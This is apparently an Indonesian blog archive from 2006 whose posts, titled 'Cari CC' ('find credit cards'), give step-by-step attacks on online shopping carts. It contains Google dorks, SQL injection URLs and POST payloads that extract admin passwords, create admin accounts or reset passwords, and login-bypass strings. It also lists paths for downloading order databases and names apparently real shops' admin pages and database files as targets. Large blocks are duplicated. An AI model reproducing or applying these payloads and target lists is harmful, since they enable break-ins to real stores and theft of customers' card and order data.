HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Lsa
Buat sebuah DWORD Value baru dan beri nama NoDefaultAdminOwner.
Klik ganda NoDefaultAdminOwner dan masukkan angka 1 pada Value Data.
Friday, December 8, 2006
Saturday, July 15, 2006
Cari CC Bagian 3
VP-ASP Shopping Cart 5.0
SQL Injection vulnerability pada script 'shopdisplayproducts.asp'
keyword allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
http://.../vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--
Ganti²lah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
dst...
Naah.. kalau berhasil, kita akan mendapatkan informasi username dan password admin!
Untuk login admin ke http://.../vpasp/shopadmin.asp
VP-ASP Shopping Cart 5.0
SQL Injection vulnerability pada script 'shopsearch.asp
keyword allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru,
postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values ('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where fldusername=''--&SubCategory=All&action.x=33&action.y=6
jangan lupa untuk mengganti dan sesuai selera!:
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://.../vpasp/shopadmin.asp
Keywords di google: cart,METACART
Details Exploit :
Access langsung pada target url dimana letak
file database pada web tertentu yang di install metacart system.
RUMUS :
http://targetshop/database/metacart.mdb
http://Targetshop/metacart/database/metacart.mdb
SQL Injection vulnerability pada script 'shopdisplayproducts.asp'
keyword allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
http://.../vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--
Ganti²lah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
dst...
Naah.. kalau berhasil, kita akan mendapatkan informasi username dan password admin!
Untuk login admin ke http://.../vpasp/shopadmin.asp
VP-ASP Shopping Cart 5.0
SQL Injection vulnerability pada script 'shopsearch.asp
keyword allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru,
postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values ('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where fldusername=''--&SubCategory=All&action.x=33&action.y=6
jangan lupa untuk mengganti dan sesuai selera!:
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://.../vpasp/shopadmin.asp
Keywords di google: cart,METACART
Details Exploit :
Access langsung pada target url dimana letak
file database pada web tertentu yang di install metacart system.
RUMUS :
http://targetshop/database/metacart.mdb
http://Targetshop/metacart/database/metacart.mdb
Friday, July 14, 2006
Cari CC Bagian 2
Kumpulan Shopadmin Exploits
google dork : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/...ir_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/...iles/order.log
keyword : inurl:"/cart.php?m="
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :'or"="
Passwordnya : 'or"="
Keyword : /ashopKart20/"
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example : www.garrysun.com/ashopkart20/addprod.asp
Injection : www.garrysun.com/ashopkart20/admin/scart.mdb
keyword : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp
trus bug tadi diganti dengan /data/pdshoppro.mdb
keyword : inurl:"/store/proddetail.asp?prod="
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
google dork : "Powered by SunShop 3.2"
Atau google dork : inurl:"/sunshop/index.php?action="
Bugs : ganti kata index.php dgn admin
Contoh: http://www.domain.com/sunshop/index.php
ganti dengan admin http://www.domain.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :'or''='
Google dork : "Powered by Digishop 3.2"
Bugs : hapus tulisan cart.php?m= dengan admin
Username : 'or"="
Password : 'or"="
google dork : inurl:"mall/lobby.asp"
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page - Search our Inventory
http://www.gemdepot.com/fpdb/shop.mdb
keyword allinurl:/DCShop/
bug: /DCShop/orders/orders.txt atau
/DCShop/Orders/orders.txt
keyword allinurl:/eshop/
bug: /cg-bin/eshop/database/order.mdb
contoh: http://www.contoh.com/.../cg-bin/eshop/database/order.mdb
google dork : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/...ir_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/...iles/order.log
keyword : inurl:"/cart.php?m="
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :'or"="
Passwordnya : 'or"="
Keyword : /ashopKart20/"
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example : www.garrysun.com/ashopkart20/addprod.asp
Injection : www.garrysun.com/ashopkart20/admin/scart.mdb
keyword : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp
trus bug tadi diganti dengan /data/pdshoppro.mdb
keyword : inurl:"/store/proddetail.asp?prod="
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
google dork : "Powered by SunShop 3.2"
Atau google dork : inurl:"/sunshop/index.php?action="
Bugs : ganti kata index.php dgn admin
Contoh: http://www.domain.com/sunshop/index.php
ganti dengan admin http://www.domain.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :'or''='
Google dork : "Powered by Digishop 3.2"
Bugs : hapus tulisan cart.php?m= dengan admin
Username : 'or"="
Password : 'or"="
google dork : inurl:"mall/lobby.asp"
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page - Search our Inventory
http://www.gemdepot.com/fpdb/shop.mdb
keyword allinurl:/DCShop/
bug: /DCShop/orders/orders.txt atau
/DCShop/Orders/orders.txt
keyword allinurl:/eshop/
bug: /cg-bin/eshop/database/order.mdb
contoh: http://www.contoh.com/.../cg-bin/eshop/database/order.mdb
Wednesday, July 12, 2006
Cari CC Bagian 1
Bug Comersus
Google dork:
allinurl:"Powered by COmersus"
allinurl:/shopdisplaycategories.asp
allinurl:/comersus_backoffice_login.php
allinurl:/backoffice/
allinurl:/backofficegold/
allinurl:/comersus_contactUs.asp
contoh letak login adminnya:
http://www.oldworldgourmet.com/cart/backofficegold/
http://www.centrodemateriales.com/admin/
http://www.swaminarayansatsang.com/shopping1/backoffice+/
http://www.mapsoft.co.yu/dev/comersus/backofficelite/
http://www.tarkentonsports.com/Comersus/backofficelite/
http://www.hugoo.com/backofficegold/
http://www.pronethost.com/shop//backofficelite/
http://www.workingproducts.com/cgi-bin/wp/backofficelite/
http://www.futuresknowledge.com/comersus/backofficelite
http://www.sheardelight.net/backofficegold/
Untuk login diatas anda dapat melakukan sql injection seperti di bawah ini:
http://www.sheardelight.net/backofficegold/
login : ' OR adminname <> '' OR adminname = '
pass : ' OR adminname <> '' OR adminname = '
Jika tidak bisa di injection maka anda bisa mendownload databasenya disini
contoh letak databasenya:
http://latintradingbooks.com/comersus/database/comersus.mdb
http://www.braziliancd.com/Comersus/database/comersus.mdb
http://www.sidewindercycle.com/database/comersus.mdb
http://www.sillyprat.co.uk/shop/database/comersus.mdb
Google dork:
allinurl:"Powered by COmersus"
allinurl:/shopdisplaycategories.asp
allinurl:/comersus_backoffice_login.php
allinurl:/backoffice/
allinurl:/backofficegold/
allinurl:/comersus_contactUs.asp
contoh letak login adminnya:
http://www.oldworldgourmet.com/cart/backofficegold/
http://www.centrodemateriales.com/admin/
http://www.swaminarayansatsang.com/shopping1/backoffice+/
http://www.mapsoft.co.yu/dev/comersus/backofficelite/
http://www.tarkentonsports.com/Comersus/backofficelite/
http://www.hugoo.com/backofficegold/
http://www.pronethost.com/shop//backofficelite/
http://www.workingproducts.com/cgi-bin/wp/backofficelite/
http://www.futuresknowledge.com/comersus/backofficelite
http://www.sheardelight.net/backofficegold/
Untuk login diatas anda dapat melakukan sql injection seperti di bawah ini:
http://www.sheardelight.net/backofficegold/
login : ' OR adminname <> '' OR adminname = '
pass : ' OR adminname <> '' OR adminname = '
Jika tidak bisa di injection maka anda bisa mendownload databasenya disini
contoh letak databasenya:
http://latintradingbooks.com/comersus/database/comersus.mdb
http://www.braziliancd.com/Comersus/database/comersus.mdb
http://www.sidewindercycle.com/database/comersus.mdb
http://www.sillyprat.co.uk/shop/database/comersus.mdb
Subscribe to:
Posts (Atom)
